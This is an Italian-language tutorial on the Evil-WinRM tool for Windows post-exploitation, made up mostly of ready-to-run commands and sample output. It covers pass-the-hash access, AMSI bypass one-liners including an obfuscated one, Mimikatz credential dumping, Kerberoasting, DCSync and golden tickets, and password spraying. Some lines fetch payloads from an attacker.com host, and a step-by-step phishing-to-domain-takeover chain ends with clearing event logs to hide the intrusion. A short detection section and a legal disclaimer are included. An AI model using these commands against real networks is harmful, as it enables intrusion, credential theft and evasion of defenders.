Evil-WinRM: Accesso Remoto e Post-Exploitation su Windows via WinRM
Evil-WinRM: shell PowerShell remota via WinRM per post-exploitation Windows. Pass-the-hash, Kerberos ticket, AMSI bypass, in-memory execution .NET assembly per lateral movement enterprise.
- Pubblicato il 2026-02-12
- Tempo di lettura: 11 min
Evil-WinRM è un tool Ruby sviluppato da Hackplayers che implementa una shell PowerShell interattiva su Windows Remote Management (WinRM) protocol con funzionalità offensive avanzate. A differenza del client WinRM standard, Evil-WinRM include AMSI bypass integrato, execution in-memory di .NET assemblies, file transfer bidirezionale e supporto pass-the-hash per lateral movement stealth.
WinRM (Windows Remote Management) è il protocollo Microsoft per amministrazione remota via HTTP/HTTPS, abilitato per default su Windows Server 2012+ e configurabile su workstation. Durante engagement Active Directory, Evil-WinRM offre shell interattiva completa con meno artifacts forensic rispetto a PsExec, posizionandosi nella fase Lateral Movement (MITRE ATT&CK T1021.006) con capabilities estese per post-exploitation.
In questa guida impari a usare Evil-WinRM per remote access via credenziali o hash NTLM, bypass AMSI per evasion detection, in-memory execution di tool .NET come Rubeus, e differenze con alternative PSRemoting per scegliere il metodo ottimale in base a network restrictions e defensive posture target.
Setup e Installazione #
Installazione via RubyGems #
Requisiti:
- Ruby 2.3 o superiore
- Bundler gem manager
- Sistema Linux/macOS (Windows via WSL)
# Install via gem (metodo consigliato)
gem install evil-winrm
# Verifica versione
evil-winrm --versionVersione corrente: v3.9 (dicembre 2024)
Installazione da Source #
# Clone repository
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm
# Install dependencies
gem install bundler
bundle install
# Execute
ruby evil-winrm.rb --helpRepository ufficiale: https://github.com/Hackplayers/evil-winrm
Docker Alternative #
# Pull image
docker pull oscarakaelvis/evil-winrm
# Run
docker run --rm -it oscarakaelvis/evil-winrm -i 192.168.1.100 -u administrator -p 'P@ssw0rd'Target Requirements #
Porte richieste:
- 5985/TCP: WinRM HTTP (default)
- 5986/TCP: WinRM HTTPS (SSL/TLS)
Configurazione target:
# Verifica WinRM status
Get-Service WinRM
# Enable WinRM (se disabilitato)
Enable-PSRemoting -Force
# Check listeners
winrm enumerate winrm/config/listenerFirewall rules:
# Allow WinRM through firewall
Enable-NetFirewallRule -Name "WINRM-HTTP-In-TCP"
Enable-NetFirewallRule -Name "WINRM-HTTPS-In-TCP"Uso Base #
Connessione con Password #
# Sintassi base
evil-winrm -i <IP> -u <username> -p '<password>'
# Esempio domain user
evil-winrm -i 192.168.1.100 -u Administrator -p 'P@ssw0rd123!'
# Con domain specificato
evil-winrm -i 192.168.1.100 -u 'CORP\admin' -p 'Password!'Output:
Evil-WinRM shell v3.9
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
corp\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
TARGET-SERVERPass-the-Hash #
# Solo NTLM hash (no password)
evil-winrm -i 192.168.1.100 -u Administrator -H '32ed87bdb5fdc5e9cba88547376818d4'
# LM:NTLM format (LM opzionale)
evil-winrm -i target -u admin -H 'aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4'Vantaggio: Lateral movement senza password plaintext, direttamente da hash dumped via Mimikatz.
Kerberos Authentication #
# Con Kerberos ticket (ccache file)
export KRB5CCNAME=/path/to/ticket.ccache
evil-winrm -i dc.corp.local -r CORP.LOCAL
# Oppure con kirbi ticket (Rubeus format)
evil-winrm -i target -u user -K /path/to/ticket.kirbiSSL/TLS Connection #
# HTTPS (porta 5986)
evil-winrm -i 192.168.1.100 -u admin -p 'Pass!' -S
# Con certificato custom
evil-winrm -i target -u admin -p pass -S -c /path/to/cert.pem -k /path/to/key.pemParametri Fondamentali #
| Parametro | Funzione | Esempio |
|---|---|---|
-i IP | Target IP/hostname | -i 192.168.1.100 |
-u USER | Username | -u Administrator |
-p PASS | Password | -p 'P@ssw0rd' |
-H HASH | NTLM hash | -H '32ed87...' |
-S | SSL/TLS (porta 5986) | -S |
-P PORT | Custom port | -P 5985 |
-r REALM | Kerberos realm | -r CORP.LOCAL |
-s SCRIPTS | Scripts directory | -s /opt/ps1/ |
-e EXES | Executables directory | -e /opt/exe/ |
-c CERT | Client certificate | -c cert.pem |
-k KEY | Private key | -k key.pem |
Tecniche Operative #
Built-in Commands #
Evil-WinRM fornisce comandi custom per operazioni offensive.
Bypass-4MSI #
# AMSI bypass automatico
*Evil-WinRM* PS> Bypass-4MSI
[+] Success!Patcha AmsiScanBuffer in memoria → PowerShell script/modules non più scanned da Windows Defender.
Test:
*Evil-WinRM* PS> Invoke-Mimikatz
# Senza Bypass-4MSI: AMSI block
# Con Bypass-4MSI: Execution successfulInvoke-Binary #
# In-memory .NET assembly execution
*Evil-WinRM* PS> Invoke-Binary /opt/Rubeus.exe kerberoast
# Con argomenti
*Evil-WinRM* PS> Invoke-Binary C:\Tools\SharpHound.exe -c AllVantaggio: No disk touch, execution diretta in memoria → evasion antivirus.
Dll-Loader #
# Reflective DLL loading
*Evil-WinRM* PS> Dll-Loader -http http://attacker.com/payload.dll
# Da SMB share
*Evil-WinRM* PS> Dll-Loader -smb \\attacker\share\ReflectiveDLL.dll
# Da file locale
*Evil-WinRM* PS> Dll-Loader -local C:\Windows\Temp\payload.dllDonut-Loader #
# Shellcode injection via donut
*Evil-WinRM* PS> Donut-Loader -process_id 1234 -donutfile /path/to/payload.bin
# Con architecture specifica
*Evil-WinRM* PS> Donut-Loader -process_id 2456 -donutfile payload.bin -arch x64File Transfer #
# Upload file to target
*Evil-WinRM* PS> upload /opt/mimikatz.exe C:\Windows\Temp\m.exe
# Download file from target
*Evil-WinRM* PS> download C:\Users\admin\Desktop\passwords.txt /tmp/loot.txt
# Menu file operations
*Evil-WinRM* PS> menuPerformance: Transfer rate ~2-5 MB/s (dipende da latency).
Services Management #
# Lista services
*Evil-WinRM* PS> services
# Info service specifico
*Evil-WinRM* PS> Get-Service WinRM
# Start/Stop service
*Evil-WinRM* PS> Start-Service ServiceName
*Evil-WinRM* PS> Stop-Service ServiceNameTecniche Avanzate #
AMSI Bypass + Mimikatz #
Chain completa per credential dumping:
# Step 1: Bypass AMSI
*Evil-WinRM* PS> Bypass-4MSI
[+] Success!
# Step 2: Upload Mimikatz (se non in scripts path)
*Evil-WinRM* PS> upload /opt/Invoke-Mimikatz.ps1 C:\Windows\Temp\im.ps1
# Step 3: Import module
*Evil-WinRM* PS> Import-Module C:\Windows\Temp\im.ps1
# Step 4: Dump credentials
*Evil-WinRM* PS> Invoke-Mimikatz -DumpCredsOutput:
Hostname: TARGET / S-1-5-21-...
.#####. mimikatz 2.2.0
.## ^ ##. "A La Vie, A L'Amour"
Username : Administrator
Domain : CORP
NTLM : 32ed87bdb5fdc5e9cba88547376818d4
SHA1 : a4f49c406510bdcab6824ee7c30fd852...In-Memory .NET Tool Execution #
# Rubeus per Kerberoasting
*Evil-WinRM* PS> Invoke-Binary /opt/Rubeus.exe kerberoast /outfile:tickets.txt
# SharpHound per BloodHound collection
*Evil-WinRM* PS> Invoke-Binary /opt/SharpHound.exe -c All -d corp.local
# Seatbelt enumeration
*Evil-WinRM* PS> Invoke-Binary /opt/Seatbelt.exe -group=allNo disk artifacts, execution pura in memoria.
Scripts Auto-Loading #
# Configura scripts directory
evil-winrm -i target -u admin -p pass -s /opt/powershell-scripts/
# Scripts caricati automaticamente
*Evil-WinRM* PS> PowerView.ps1 loaded
*Evil-WinRM* PS> Invoke-ShareFinder.ps1 loadedUso:
*Evil-WinRM* PS> Get-DomainUser -Identity admin
*Evil-WinRM* PS> Invoke-ShareFinderExes Auto-Loading #
# Configura executables directory
evil-winrm -i target -u admin -p pass -e /opt/windows-tools/
# Esegui direttamente
*Evil-WinRM* PS> mimikatz.exe
*Evil-WinRM* PS> rubeus.exe kerberoastTool in -e path sono uploadati temporaneamente e eseguiti on-demand.
Credential Spraying Chain #
# Password spray con Evil-WinRM
for user in $(cat users.txt); do
echo "[*] Testing: $user"
timeout 10 evil-winrm -i 192.168.1.100 -u "$user" -p 'Winter2024!' -e 'whoami' 2>&1 | grep -q "administrator" && echo "[+] Success: $user"
doneAttenzione: Rispetta account lockout policy per evitare DoS.
Scenari Pratici #
Scenario 1: WinRM Access Post-Credential Harvest #
Contesto: Hai dumpato hash NTLM da workstation, vuoi shell su server management.
Timeline: 1-2 minuti
Comando:
# Hash ottenuto: CORP\it-admin : a4f49c406510bdcab6824ee7c30fd852
# Verifica WinRM aperto
nmap -p5985 192.168.10.200
# PTH connection
evil-winrm -i 192.168.10.200 -u it-admin -H 'a4f49c406510bdcab6824ee7c30fd852'Output atteso:
Evil-WinRM shell v3.9
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\it-admin\Documents> whoami
corp\it-admin
*Evil-WinRM* PS> hostname
MGMT-SERVER-01
*Evil-WinRM* PS> Get-LocalGroupMember Administrators
Name PrincipalSource
---- ---------------
CORP\Domain Admins ActiveDirectory
CORP\IT-Admins ActiveDirectory
NT AUTHORITY\SYSTEM LocalExploitation:
# Bypass AMSI
*Evil-WinRM* PS> Bypass-4MSI
# Enumerate domain admins logged in
*Evil-WinRM* PS> query user
# Token theft (se DA presente)
*Evil-WinRM* PS> upload /opt/Invoke-TokenManipulation.ps1
*Evil-WinRM* PS> . .\Invoke-TokenManipulation.ps1
*Evil-WinRM* PS> Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username "CORP\Administrator"Cosa fare se fallisce:
Errore: “Error: An error of type WinRM::WinRMAuthorizationError happened”
- Causa: User non in gruppo “Remote Management Users”
- Fix: Verifica group membership
# Su target (con altro accesso)
Add-LocalGroupMember -Group "Remote Management Users" -Member "CORP\it-admin"Errore: “Bad HTTP response”
- Causa: WinRM disabled o firewall block
- Fix: Test connettività
nmap -p5985,5986 target
curl http://target:5985/wsmanConnessione si chiude immediatamente:
- Causa: Session timeout policy restrittiva
- Fix: Aumenta idle timeout (richiede accesso GPO)
Scenario 2: In-Memory Rubeus Kerberoasting #
Contesto: Vuoi Kerberoast domain senza droppare Rubeus su disco.
Timeline: 3-5 minuti
Step 1 - Connection:
evil-winrm -i DC01.corp.local -u 'CORP\domain_user' -p 'UserPass123!'Step 2 - AMSI bypass:
*Evil-WinRM* PS> Bypass-4MSI
[+] Success!Step 3 - In-memory Rubeus:
*Evil-WinRM* PS> Invoke-Binary /opt/Rubeus.exe kerberoast /outfile:C:\Windows\Temp\tickets.txtOutput:
[*] Action: Kerberoasting
[*] Searching for Kerberoastable accounts
[*] Target SPN: MSSQLSvc/sql01.corp.local:1433
[*] User: svc_sql
[*] Ticket: $krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/sql01...
[*] Target SPN: HTTP/sharepoint.corp.local
[*] User: svc_sharepoint
[*] Ticket: $krb5tgs$23$*svc_sharepoint$CORP.LOCAL$HTTP/shar...
[+] Tickets written to C:\Windows\Temp\tickets.txtStep 4 - Download tickets:
*Evil-WinRM* PS> download C:\Windows\Temp\tickets.txt /tmp/kerberoast_hashes.txtStep 5 - Crack offline:
# Con Hashcat
hashcat -m 13100 kerberoast_hashes.txt rockyou.txt
# Output:
# $krb5tgs$23$*svc_sql...:Password123!Cosa fare se fallisce:
“Unable to load DLL” o “Invoke-Binary error”:
- Causa: Rubeus.exe non compatible con architecture target
- Fix: Usa versione corretta (x86 vs x64)
# Verifica architecture
*Evil-WinRM* PS> [Environment]::Is64BitOperatingSystem
# Upload Rubeus x64 o x86 appropriatoNessun ticket trovato:
- Causa: Nessun SPN kerberoastable
- Fix: Enumera manualmente SPNs
*Evil-WinRM* PS> Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName | Select SamAccountName,ServicePrincipalNameAMSI blocca comunque Rubeus:
- Causa: Bypass-4MSI fallito (updated AMSI signatures)
- Fix: Alternative AMSI bypass
# PowerShell reflection method
*Evil-WinRM* PS> [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)Scenario 3: BloodHound Collection via Evil-WinRM #
Contesto: Vuoi mappare AD senza detection, using in-memory SharpHound.
Timeline: 5-10 minuti (dipende da AD size)
Step 1 - Setup:
# Connection con scripts path
evil-winrm -i 192.168.1.100 -u 'CORP\user' -p 'pass' -s /opt/bloodhound/Step 2 - Collection:
*Evil-WinRM* PS> Bypass-4MSI
# In-memory SharpHound
*Evil-WinRM* PS> Invoke-Binary /opt/SharpHound.exe -c All -d corp.local --zipfilename corp_bloodhound.zipOutput:
2024-12-15T14:30:00.0000000-08:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-12-15T14:30:05.0000000-08:00|INFORMATION|Initializing SharpHound at 2:30 PM on 12/15/2024
2024-12-15T14:30:10.0000000-08:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-12-15T14:30:15.0000000-08:00|INFORMATION|Beginning LDAP search
2024-12-15T14:35:20.0000000-08:00|INFORMATION|Consumers finished, closing output channel
2024-12-15T14:35:21.0000000-08:00|INFORMATION|Output channel closed, waiting for output task to complete
2024-12-15T14:35:25.0000000-08:00|INFORMATION|SharpHound Enumeration Completed at 2:35 PM on 12/15/2024! Happy Graphing!Step 3 - Download data:
*Evil-WinRM* PS> download C:\Users\user\Documents\20241215143025_corp_bloodhound.zip /tmp/bloodhound_data.zipStep 4 - Analysis:
# Import in BloodHound
neo4j start
bloodhound
# Upload ZIP in BloodHound UI
# Analysis: Find shortest path to Domain AdminsCosa fare se fallisce:
Collection incompleta o errori LDAP:
- Causa: Permissions insufficienti
- Fix: Usa Domain User standard (non serve DA per basic collection)
ZIP file troppo grande per download:
- Causa: Large AD environment (>100 MB ZIP)
- Fix: Split ZIP
*Evil-WinRM* PS> $file = "bloodhound.zip"
*Evil-WinRM* PS> $chunks = [Math]::Ceiling((Get-Item $file).Length / 10MB)
*Evil-WinRM* PS> 1..$chunks | ForEach-Object {
$start = ($_ - 1) * 10MB
[System.IO.File]::ReadAllBytes($file)[$start..($start + 10MB)] |
Set-Content "bloodhound_part$_.zip" -Encoding Byte
}
# Download parts separatamente
*Evil-WinRM* PS> download bloodhound_part1.zip
*Evil-WinRM* PS> download bloodhound_part2.zipSharpHound crash con OutOfMemory:
- Causa: Target ha poca RAM disponibile
- Fix: Collection incrementale
# Session collection only
*Evil-WinRM* PS> Invoke-Binary SharpHound.exe -c Session
# Poi Group
*Evil-WinRM* PS> Invoke-Binary SharpHound.exe -c Group
# Merge JSON filesToolchain Integration #
Flusso Post-Exploitation Chain #
Hash Dump → Evil-WinRM (access) → Rubeus (kerberoast) → Hashcat (crack) → Lateral MovementPassaggio dati concreto:
# Step 1: Hash da Mimikatz
NTLM: a4f49c406510bdcab6824ee7c30fd852
# Step 2: PTH con Evil-WinRM
evil-winrm -i 192.168.1.100 -u admin -H a4f49c406510bdcab6824ee7c30fd852
# Step 3: Kerberoast
*Evil-WinRM* PS> Invoke-Binary Rubeus.exe kerberoast /outfile:tickets.txt
*Evil-WinRM* PS> download tickets.txt
# Step 4: Crack con Hashcat
hashcat -m 13100 tickets.txt rockyou.txt
# Output: svc_sql:Password123!
# Step 5: Lateral to SQL server
evil-winrm -i sql01.corp.local -u svc_sql -p 'Password123!'Evil-WinRM vs PsExec vs SSH #
| Feature | Evil-WinRM | PsExec | SSH (OpenSSH) |
|---|---|---|---|
| Protocol | WinRM (HTTP/HTTPS) | SMB | SSH |
| Port | 5985/5986 | 445 | 22 |
| Binary drop | No | Sì (PSEXESVC.exe) | No |
| Service creation | No | Sì | No |
| Pass-the-Hash | Sì | Sì (Impacket) | No |
| Interactive shell | Full PowerShell | CMD basic | Bash/PowerShell |
| In-memory execution | Sì (Invoke-Binary) | No | No |
| AMSI bypass | Built-in | Manual | N/A |
| File transfer | Built-in (upload/download) | Manual (copy) | SCP/SFTP |
| Detection (Event ID) | 4624 (Type 3), WinRM 91 | 7045, 4624 | 4624 (Type 10) |
| Stealth | Medio-Alto | Basso | Alto |
Quando usare Evil-WinRM:
- WinRM enabled su target (common su Server 2012+)
- Vuoi interactive PowerShell completo
- Necessità in-memory tool execution (.NET)
- Pass-the-hash requirements
- File transfer bidirezionale
Quando usare PsExec:
- WinRM disabled, solo SMB available
- Reliability massima (SMB sempre aperto)
- Detection non è concern
Quando usare SSH:
- OpenSSH enabled (Windows 10 1809+)
- Maximum stealth (SSH normal admin traffic)
- No pass-the-hash needed
Integration con Impacket #
# Impacket per initial foothold
psexec.py -hashes :hash CORP/admin@target
# Pivot to Evil-WinRM per capabilities avanzate
evil-winrm -i target -u admin -H hash
# In Evil-WinRM: advanced post-exploitation
*Evil-WinRM* PS> Bypass-4MSI
*Evil-WinRM* PS> Invoke-Binary Rubeus.exe dump /service:krbtgtIntegration con Cobalt Strike #
# Cobalt Strike beacon → Evil-WinRM per interactive access
# Da beacon, spawn Evil-WinRM session
beacon> shell evil-winrm -i 192.168.1.100 -u admin -p pass
# Oppure upload tool e execute via beacon
beacon> upload /opt/Rubeus.exe C:\Windows\Temp\r.exe
beacon> shell evil-winrm -i localhost -u admin -p pass -e 'C:\Windows\Temp\r.exe kerberoast'Attack Chain Completa #
Phishing → Domain Takeover via WinRM #
Timeline totale: 3-4 ore
Fase 1: Initial Access (T+0)
Phishing macro → Shell on user workstation.
Fase 2: Credential Harvest (T+20min)
# Mimikatz dump
PS> .\mimikatz.exe "sekurlsa::logonpasswords" exit
# Hash trovato:
# CORP\backup_admin : b4e7c8d9a1f2e3b5c6a7d8e9f0a1b2c3Fase 3: Lateral to Server (T+35min)
# WinRM access
evil-winrm -i 192.168.10.200 -u backup_admin -H b4e7c8d9a1f2e3b5c6a7d8e9f0a1b2c3Fase 4: Kerberoasting (T+50min)
*Evil-WinRM* PS> Bypass-4MSI
*Evil-WinRM* PS> Invoke-Binary Rubeus.exe kerberoast /outfile:tickets.txt
*Evil-WinRM* PS> download tickets.txtFase 5: Crack Service Accounts (T+1h 30min)
hashcat -m 13100 tickets.txt rockyou.txt
# Cracked:
# svc_mssql:SQLPass2024!Fase 6: SQL Server Access (T+1h 45min)
evil-winrm -i sql01.corp.local -u svc_mssql -p 'SQLPass2024!'
*Evil-WinRM* PS> whoami /groups
# CORP\Domain AdminsService account è DA!
Fase 7: DC Access (T+2h)
evil-winrm -i DC01.corp.local -u svc_mssql -p 'SQLPass2024!'
*Evil-WinRM* PS> Bypass-4MSI
*Evil-WinRM* PS> upload /opt/mimikatz.exe
*Evil-WinRM* PS> .\mimikatz.exe "lsadump::dcsync /all /csv" exit > hashes.csv
*Evil-WinRM* PS> download hashes.csvFase 8: Golden Ticket (T+2h 15min)
*Evil-WinRM* PS> .\mimikatz.exe "kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21... /krbtgt:[HASH] /ptt" exitRisultato: Domain takeover completo via WinRM chain.
Detection & Evasion #
Blue Team Monitoring #
Event ID rilevanti:
| Event ID | Log | Descrizione |
|---|---|---|
| 4624 | Security | Logon Type 3 (Network) |
| 4672 | Security | Special privileges assigned |
| 91 | WinRM Operational | Session creation |
| 142 | WinRM Operational | User authentication success |
| 161 | WinRM Operational | User logon |
| 4688 | Security | Process creation (powershell.exe, wsmprovhost.exe) |
| 4103 | PowerShell Operational | Module logging |
| 4104 | PowerShell Operational | Script block logging |
Process chain telemetry:
svchost.exe (WinRM service)
└─> wsmprovhost.exe (WinRM provider host)
└─> powershell.exe (user session)
└─> [tool].exe (Rubeus, SharpHound, etc)WinRM Event 91 specifico:
<Event>
<EventID>91</EventID>
<EventData>
<Data Name="UserName">CORP\admin</Data>
<Data Name="ClientIP">192.168.1.50</Data>
</EventData>
</Event>PowerShell Script Block Logging (4104):
ScriptBlockText: Bypass-4MSI
ScriptBlockId: ...AMSI bypass attempts logged.
Tecniche Evasion #
1. Custom AMSI Bypass
Bypass-4MSI può essere detected. Alternative:
# Reflection method
*Evil-WinRM* PS> [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# Memory patching
*Evil-WinRM* PS> $mem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(4)
[System.Runtime.InteropServices.Marshal]::WriteInt32($mem, 0x80070057)2. Encrypted Communication
# Usa HTTPS (porta 5986) invece HTTP
evil-winrm -i target -u admin -p pass -S
# Traffic encrypted, più difficile IDS detection3. Delayed Execution
# Scheduled task invece di immediate execution
*Evil-WinRM* PS> schtasks /create /tn "Update" /tr "powershell -c IEX(...)" /sc once /st 03:00
# Execution durante finestra bassa attività SOC4. Kerberos invece di NTLM
# Kerberos authentication (meno suspicious)
export KRB5CCNAME=/path/to/ticket.ccache
evil-winrm -i dc.corp.local -r CORP.LOCAL
# Vs NTLM (più monitored)
evil-winrm -i target -u admin -H hashCleanup Post-Exploitation #
# Remove uploaded files
*Evil-WinRM* PS> Remove-Item C:\Windows\Temp\*.exe -Force
*Evil-WinRM* PS> Remove-Item C:\Users\*\Documents\*.zip -Force
# Clear PowerShell history
*Evil-WinRM* PS> Remove-Item (Get-PSReadlineOption).HistorySavePath -Force
# Clear event logs (requires elevated privileges)
*Evil-WinRM* PS> wevtutil cl "Windows PowerShell"
*Evil-WinRM* PS> wevtutil cl "Microsoft-Windows-PowerShell/Operational"
*Evil-WinRM* PS> wevtutil cl "Microsoft-Windows-WinRM/Operational"Automated cleanup script:
# cleanup.ps1
Get-ChildItem C:\Windows\Temp\ -Filter *.exe | Remove-Item -Force
Get-ChildItem C:\Users\ -Recurse -Filter *bloodhound*.zip | Remove-Item -Force
Remove-Item (Get-PSReadlineOption).HistorySavePath -ErrorAction SilentlyContinue
Clear-EventLog -LogName "Windows PowerShell" -ErrorAction SilentlyContinue
# Execute via Evil-WinRM
*Evil-WinRM* PS> . .\cleanup.ps1Performance & Scaling #
Single Connection Performance #
Latency:
- Local network (<1ms): Response time 50-100ms
- Cross-subnet (5-10ms): Response time 200-300ms
- VPN (50ms+): Response time 500ms-1s
Resource consumption (attacker):
- CPU: <5%
- RAM: ~50 MB per session
- Network: ~10-50 KB/s (idle), ~2-5 MB/s (file transfer)
Multiple Concurrent Sessions #
# Parallel connections (GNU parallel)
cat targets.txt | parallel -j 10 'evil-winrm -i {} -u admin -H hash -e "whoami" | tee {}.txt'
# Output per target salvato separatamenteScalability:
| Concurrent Sessions | Attacker RAM | Network B/W |
|---|---|---|
| 5 | ~250 MB | ~50 KB/s |
| 10 | ~500 MB | ~100 KB/s |
| 20 | ~1 GB | ~200 KB/s |
| 50 | ~2.5 GB | ~500 KB/s |
Limit pratico: 20-30 sessioni concorrenti per attacker machine standard.
File Transfer Performance #
Upload speed:
# Test transfer 100 MB file
Measure-Command {
upload /opt/payload.zip C:\Windows\Temp\payload.zip
}
# Local network: ~20-30 secondi (3-5 MB/s)
# Cross-subnet: ~40-60 secondi (1.5-2.5 MB/s)
# VPN: ~120-180 secondi (0.5-0.8 MB/s)Optimization:
- Comprimi file prima transfer (ZIP)
- Usa HTTPS per encrypted transfer efficiente
- Split large files in chunks
Troubleshooting #
“Connection refused” o Timeout #
Causa: WinRM disabled o firewall block.
Diagnosi:
# Test porta
nmap -p5985,5986 target
# Test HTTP response
curl -v http://target:5985/wsmanFix:
# Su target (con altro accesso)
Enable-PSRemoting -Force
# Firewall rule
Enable-NetFirewallRule -Name "WINRM-HTTP-In-TCP"“WinRMAuthorizationError” #
Causa: User non autorizzato per WinRM.
Diagnosi:
# Verifica group membership
Get-LocalGroupMember "Remote Management Users"Fix:
# Aggiungi user al gruppo
Add-LocalGroupMember -Group "Remote Management Users" -Member "CORP\user"
# Oppure usa local Administrator“Bad HTTP response returned from server (500)” #
Causa: Configurazione WinRM errata o MaxShellsPerUser limit.
Diagnosi:
# Check WinRM config
winrm get winrm/config
# Verifica limits
winrm get winrm/config/winrsFix:
# Aumenta shell limit
winrm set winrm/config/winrs '@{MaxShellsPerUser="10"}'
# Aumenta memory per shell
winrm set winrm/config/winrs '@{MaxMemoryPerShellMB="1024"}'Bypass-4MSI Non Funziona #
Causa: AMSI patches updated, Bypass-4MSI detected.
Fix Alternative:
# Method 1: Reflection
*Evil-WinRM* PS> [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# Method 2: Obfuscation
*Evil-WinRM* PS> $a='si';$b='Am';$c='Utils';IEX([Ref].Assembly.GetType(('System.Management.Automation.{0}{1}{2}' -f $b,$a,$c)).GetField(('am{0}InitFailed' -f $a),'NonPublic,Static').SetValue($null,$true))
# Method 3: Download custom bypass
*Evil-WinRM* PS> IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/bypass.ps1')Upload/Download Fallisce #
Causa: File size limite o permissions.
Diagnosi:
# Verifica disk space
*Evil-WinRM* PS> Get-PSDrive C | Select Used,Free
# Verifica permissions
*Evil-WinRM* PS> Test-Path C:\Windows\Temp -PathType ContainerFix:
# Usa path alternative
*Evil-WinRM* PS> upload file.exe C:\Users\Public\file.exe
# Split large files
split -b 10M largefile.zip part_
# Upload parts separatamenteFAQ #
Evil-WinRM richiede credenziali Domain Admin?
No. Evil-WinRM richiede user con permessi WinRM (gruppo “Remote Management Users”) oppure local Administrator. Per domain operations avanzate (Kerberoasting, BloodHound) basta Domain User standard.
Differenza tra Evil-WinRM e PSRemoting nativo?
Evil-WinRM include offensive features: AMSI bypass built-in, in-memory .NET execution (Invoke-Binary), file transfer comandi, Dll-Loader, pass-the-hash support. PSRemoting nativo (Enter-PSSession) è amministrazione legittima senza queste capabilities.
Pass-the-Hash funziona su WinRM?
Sì con Evil-WinRM. WinRM supporta NTLM authentication quindi PTH è possibile. Usa flag -H con hash NTLM. Nota: alcuni ambienti enforced Kerberos-only, in quel caso PTH fallisce.
Evil-WinRM bypassa NLA (Network Level Authentication)?
NLA è feature RDP, non WinRM. WinRM ha propria autenticazione (NTLM/Kerberos). Evil-WinRM non è affected da NLA settings.
Invoke-Binary funziona con qualsiasi .NET assembly?
Sì, purché target abbia .NET Framework appropriato. Rubeus, SharpHound, Seatbelt, SharpDPAPI funzionano tutti. Verifica .NET version:
*Evil-WinRM* PS> [System.Runtime.InteropServices.RuntimeInformation]::FrameworkDescriptionDetection Evil-WinRM vs amministrazione legittima?
Challenging. Differenze subtle:
- Legittimo: Source IP aziendale, user admin known, business hours
- Malicious: Source IP external/unexpected, off-hours, AMSI bypass attempts (Event 4104), rapid tool execution
Behavioral analytics e baseline sono key.
WinRM over HTTPS richiede certificato valido?
No con Evil-WinRM. Flag -S ignora certificate validation per default (self-signed OK). Per production, Evil-WinRM supporta custom cert con -c e -k flags.
Cheat Sheet #
| Comando | Descrizione |
|---|---|
evil-winrm -i IP -u user -p 'pass' | Connection con password |
evil-winrm -i IP -u user -H NTLM | Pass-the-Hash |
evil-winrm -i IP -u user -p pass -S | HTTPS (porta 5986) |
evil-winrm -i host -r REALM | Kerberos auth |
Bypass-4MSI | AMSI bypass built-in |
Invoke-Binary /path/tool.exe args | In-memory .NET execution |
Dll-Loader -http URL | Reflective DLL loading |
upload local remote | Upload file to target |
download remote local | Download file from target |
services | Lista Windows services |
menu | Help menu comandi Evil-WinRM |
Workflow post-exploitation tipico:
# 1. PTH connection
evil-winrm -i 192.168.1.100 -u admin -H hash
# 2. AMSI bypass
*Evil-WinRM* PS> Bypass-4MSI
# 3. Enumeration
*Evil-WinRM* PS> Invoke-Binary /opt/Seatbelt.exe -group=all
# 4. Credential access
*Evil-WinRM* PS> Invoke-Binary /opt/Rubeus.exe dump
# 5. Lateral movement
# [use credentials found]
evil-winrm -i next_target -u user -p 'cracked_password'Disclaimer: Evil-WinRM è tool di penetration testing per uso esclusivamente in ambienti autorizzati. L’utilizzo non autorizzato per accesso remoto e post-exploitation costituisce reato penale (accesso abusivo art. 615-ter c.p.). Usa solo su infrastrutture di tua proprietà o con consenso scritto del proprietario. Repository: https://github.com/Hackplayers/evil-winrm
